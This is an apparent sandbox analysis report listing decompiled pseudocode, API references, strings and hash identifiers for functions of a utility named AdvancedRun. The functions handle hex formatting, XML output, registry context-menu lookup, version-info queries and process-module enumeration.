                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 71%
                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                  0x00404fe0
                                                                  0x00404fe9
                                                                  0x00405000
                                                                  0x00405005
                                                                  0x00405009
                                                                  0x0040500c
                                                                  0x0040500e
                                                                  0x00405015
                                                                  0x00405016
                                                                  0x00405021
                                                                  0x00405026
                                                                  0x00405027
                                                                  0x0040502c
                                                                  0x00405031
                                                                  0x00405039
                                                                  0x0040503f
                                                                  0x00405044
                                                                  0x00405048
                                                                  0x0040504e
                                                                  0x00405056
                                                                  0x0040505c
                                                                  0x0040504e
                                                                  0x00405065
                                                                  0x0040506a
                                                                  0x00405072
                                                                  0x00405079

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2521778956-791839006
                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 42%
                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                  0x00407d9c
                                                                  0x00407d9e
                                                                  0x00407da5
                                                                  0x00407db3
                                                                  0x00407dba
                                                                  0x00407dc5
                                                                  0x00407dc7
                                                                  0x00407dd0
                                                                  0x00407dc9
                                                                  0x00407dc9
                                                                  0x00407dc9
                                                                  0x00407dd8
                                                                  0x00407de1
                                                                  0x00407de5
                                                                  0x00407deb
                                                                  0x00407df2
                                                                  0x00407df3
                                                                  0x00407dfe
                                                                  0x00407e03
                                                                  0x00407e04
                                                                  0x00407e21

                                                                  APIs
                                                                  Strings
                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                  • <%s>, xrefs: 00407DF3
                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                  • API String ID: 3473751417-2880344631
                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                  0x00403b56
                                                                  0x00403b5d
                                                                  0x00403b6f
                                                                  0x00403b76
                                                                  0x00403b82
                                                                  0x00403b8d
                                                                  0x00403b8e
                                                                  0x00403b99
                                                                  0x00403b9e
                                                                  0x00403b9f
                                                                  0x00403ba7
                                                                  0x00403bb9
                                                                  0x00403bce
                                                                  0x00403be5
                                                                  0x00403bef
                                                                  0x00403bf8
                                                                  0x00403c00

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00403B5D
                                                                  • memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                  • API String ID: 1832587304-479876776
                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                  0x0040afd3
                                                                  0x0040afe2
                                                                  0x0040aff3
                                                                  0x0040b002
                                                                  0x0040b023
                                                                  0x00000000
                                                                  0x0040b047
                                                                  0x0040b02e
                                                                  0x0040b034
                                                                  0x0040b03c
                                                                  0x00000000

                                                                  APIs
                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                  • String ID: \StringFileInfo\
                                                                  • API String ID: 393120378-2245444037
                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscpy
                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                  • API String ID: 999028693-502967061
                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 38%
                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                  0x004092f3
                                                                  0x004092fb
                                                                  0x00409303
                                                                  0x00409305
                                                                  0x00409310
                                                                  0x00409433
                                                                  0x00409433
                                                                  0x00409439
                                                                  0x0040943f
                                                                  0x00409445
                                                                  0x0040944b
                                                                  0x0040944e
                                                                  0x00409452
                                                                  0x00409466
                                                                  0x0040946e
                                                                  0x00409475
                                                                  0x004094f7
                                                                  0x004094f7
                                                                  0x004094f9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409488
                                                                  0x00409494
                                                                  0x004094a5
                                                                  0x004094a9
                                                                  0x004094b5
                                                                  0x004094c3
                                                                  0x004094c6
                                                                  0x004094d5
                                                                  0x004094dc
                                                                  0x004094e1
                                                                  0x004094e3
                                                                  0x004094f1
                                                                  0x00000000
                                                                  0x004094f1
                                                                  0x00000000
                                                                  0x004094e3
                                                                  0x00000000
                                                                  0x004094f7
                                                                  0x00409452
                                                                  0x00409316
                                                                  0x00409316
                                                                  0x0040931c
                                                                  0x00000000
                                                                  0x00409322
                                                                  0x0040932b
                                                                  0x00409333
                                                                  0x00409337
                                                                  0x00409341
                                                                  0x00409342
                                                                  0x0040934e
                                                                  0x0040934f
                                                                  0x00409358
                                                                  0x0040935e
                                                                  0x0040935e
                                                                  0x00409363
                                                                  0x0040936b
                                                                  0x0040936d
                                                                  0x00409377
                                                                  0x00409385
                                                                  0x0040938d
                                                                  0x0040939d
                                                                  0x004093a5
                                                                  0x004093ac
                                                                  0x004093b4
                                                                  0x004093c5
                                                                  0x004093c9
                                                                  0x004093da
                                                                  0x004093df
                                                                  0x004093e5
                                                                  0x004093e6
                                                                  0x004093ea
                                                                  0x004093f6
                                                                  0x004093fc
                                                                  0x00409407
                                                                  0x00409407
                                                                  0x0040941d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409423
                                                                  0x00409428
                                                                  0x00409375
                                                                  0x00409375
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040942e
                                                                  0x00000000
                                                                  0x00409428
                                                                  0x00409377
                                                                  0x0040936d
                                                                  0x004094fb
                                                                  0x004094ff
                                                                  0x004094ff
                                                                  0x00409337
                                                                  0x0040931c
                                                                  0x0040950f

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                  • memset.MSVCRT ref: 0040938D
                                                                  • memset.MSVCRT ref: 0040939D
                                                                    • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                  • memset.MSVCRT ref: 00409488
                                                                  • wcscpy.MSVCRT ref: 004094A9
                                                                  • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                  • String ID:
                                                                  • API String ID: 3300951397-0
                                                                  • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                  • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                  • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                  • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 44%
                                                                  			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                  0x00402ed7
                                                                  0x00402eee
                                                                  0x00402ef8
                                                                  0x00402f00
                                                                  0x00402f01
                                                                  0x00402f05
                                                                  0x00402f0a
                                                                  0x00402f1a
                                                                  0x00402f30

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                  • String ID:
                                                                  • API String ID: 19018683-0
                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 50%
                                                                  			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                  0x004079a4
                                                                  0x004079b8
                                                                  0x004079bd
                                                                  0x004079c2
                                                                  0x004079c5
                                                                  0x004079c5
                                                                  0x004079db
                                                                  0x004079f7
                                                                  0x00407a06
                                                                  0x00407a0c
                                                                  0x00407a11
                                                                  0x00407a13
                                                                  0x00407a14
                                                                  0x00407a17
                                                                  0x00407a18
                                                                  0x00407a1d
                                                                  0x00407a22
                                                                  0x00407a25
                                                                  0x00407a2a
                                                                  0x00407a35
                                                                  0x00407a3a
                                                                  0x00407a3b
                                                                  0x00407a40
                                                                  0x00407a52

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004079DB
                                                                    • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407A25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                  • API String ID: 1775345501-2769808009
                                                                  • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                  • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                  • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                  • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                  0x00404683
                                                                  0x00404692
                                                                  0x00404699
                                                                  0x0040469b
                                                                  0x004046af
                                                                  0x004046ba
                                                                  0x004046bc
                                                                  0x004046c7
                                                                  0x004046cc
                                                                  0x004046cd
                                                                  0x004046ee
                                                                  0x004046f3
                                                                  0x004046fa
                                                                  0x004046fa
                                                                  0x004046ee
                                                                  0x00404705

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004046AF
                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
